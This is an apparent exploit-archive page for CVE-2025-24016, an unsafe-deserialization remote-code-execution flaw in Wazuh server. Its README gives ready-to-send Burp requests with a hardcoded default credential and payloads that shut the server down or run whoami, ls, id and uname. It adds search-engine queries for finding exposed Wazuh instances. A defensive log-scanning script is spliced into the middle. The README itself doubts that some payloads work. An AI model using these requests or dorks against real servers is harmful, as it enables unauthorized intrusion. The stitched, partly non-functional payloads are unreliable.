Associated Vulnerability
Title: Remote code execution in Wazuh server (CVE-2025-24016)
Description: Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in a DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary Python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.
Description
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
Readme
🚨 Wazuh Remote Code Execution (RCE) - PoC
### 📌 Vulnerability Summary
> A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
🔍 **Details**
> The flaw lies in the Wazuh API's DistributedAPI, where user-controlled input is unsafely deserialized. This allows attackers with API access (e.g., compromised dashboard or cluster node) to execute arbitrary Python code on the master server using the run_as endpoint.
📬 **Proof of Concept (Burp Request)**
```http
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}
```
📌 The Authorization header is the base64 of `wazuh-wui:MyS3cr37P450r.*-`.
📌 The payload causes the Wazuh server to shut down by calling Python's `exit()` method.
💥 **Impact**
- Full Remote Code Execution via the API
- Server Shutdown in PoC (DoS)
- Risk of lateral movement across Wazuh clusters
🛡️ **Mitigation**
- ✅ Upgrade to Wazuh v4.9.1 or higher
- 🚫 Avoid exposing the API externally
- 🧪 Monitor unusual API activity
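As an added defensive example (not part of this PoC or of Wazuh's own code), the following Python walks API request bodies for the `__unhandled_exc__` marker dictionary the advisory names, nested at any depth, and reports where it sits; the JSON-lines log record format (`src`, `path`, `body`) is a constructed assumption, not a Wazuh log format.

```python
import json
from typing import Any, Iterator

# Marker named in the advisory: a dict carrying "__unhandled_exc__" with
# "__class__"/"__args__" is what the vulnerable deserializer turned into code.
MARKER = "__unhandled_exc__"

def find_markers(obj: Any, path: str = "$") -> Iterator[tuple[str, str, Any]]:
    """Yield (json_path, class_name, args) for every marker dict nested anywhere in obj."""
    if isinstance(obj, dict):
        if MARKER in obj and isinstance(obj[MARKER], dict):
            inner = obj[MARKER]
            yield (f"{path}.{MARKER}", str(inner.get("__class__")), inner.get("__args__"))
        for key, value in obj.items():
            yield from find_markers(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from find_markers(value, f"{path}[{i}]")

def scan_api_log(lines: list[str]) -> list[dict]:
    """Scan JSON-lines records (hypothetical fields: src, path, body) and report hits."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed record: nothing to inspect
        if not isinstance(rec, dict):
            continue
        body = rec.get("body")
        if isinstance(body, str):  # body logged as a raw JSON string
            try:
                body = json.loads(body)
            except json.JSONDecodeError:
                continue
        for jpath, cls, args in find_markers(body):
            hits.append({"src": rec.get("src"), "path": rec.get("path"),
                         "at": jpath, "class": cls, "args": args})
    return hits

def _rec(src: str, path: str, body: Any) -> str:
    """Build one constructed log record with the body embedded as a JSON string."""
    return json.dumps({"src": src, "path": path, "body": json.dumps(body)})

# Constructed sample records: one top-level marker, one benign request,
# one marker buried inside a list, and one malformed line.
SAMPLE_LOG = [
    _rec("10.0.0.5", "/security/user/authenticate/run_as", {MARKER: {"__class__": "exit", "__args__": []}}),
    _rec("10.0.0.7", "/agents", {"limit": 10, "q": "status=active"}),
    _rec("10.0.0.9", "/security/user/authenticate/run_as",
         {"ctx": [{"role": "x"}, {MARKER: {"__class__": "ValueError", "__args__": ["y"]}}]}),
    "not json at all",
]

if __name__ == "__main__":
    for hit in scan_api_log(SAMPLE_LOG):
        print(hit)
```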
### ✅ Example Payload to Run whoami
```json
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}
```
But this alone won’t work unless the deserialization code actually executes the object tree. Instead, use a `__reduce__` based object that executes code.
Here’s the working format for a **Burp request** using Python’s `os.system()` via pickle-like logic:
💣 **Working Burp RCE Payload (Python Code Execution)**
```http
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}
```
🧬 **To run `ls`, change the payload:**
```json
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}
```
You can also use:
```json
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}
```
⚠️ Note: The actual deserialization must happen with `eval()` or similar mechanisms in the backend for this to work. Based on the Wazuh PoC, this is indeed possible if you control auth_context.
🔐 **Pro Tip**
Intercept the request in Burp, go to the Repeater tab, and test multiple payloads like:
- `"whoami"`
- `"id"`
- `"uname -a"`
- `"ls /home/wazuh"`
👇 **Query**
- HUNTER: `product.name="Wazuh"`
- FOFA: `app="Wazuh"`
If the response is **empty** or status is **500**, check logs — **sometimes output isn’t returned.**
📚 Stay **sharp**, **hackers**! More **bug bounty PoCs**, **bypasses**, and **payloads** are coming!
Follow 👉 [@cybersecplayground](https://t.me/cybersecplayground) for daily hacking content!
> #bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit
File Snapshot
[4.0K] /data/pocs/7a0130c576062f15fcfa81629f7392e49266ed4a
├── [1021] CVE-2025-24016-POC.py
├── [1.1K] LICENSE
└── [3.0K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support.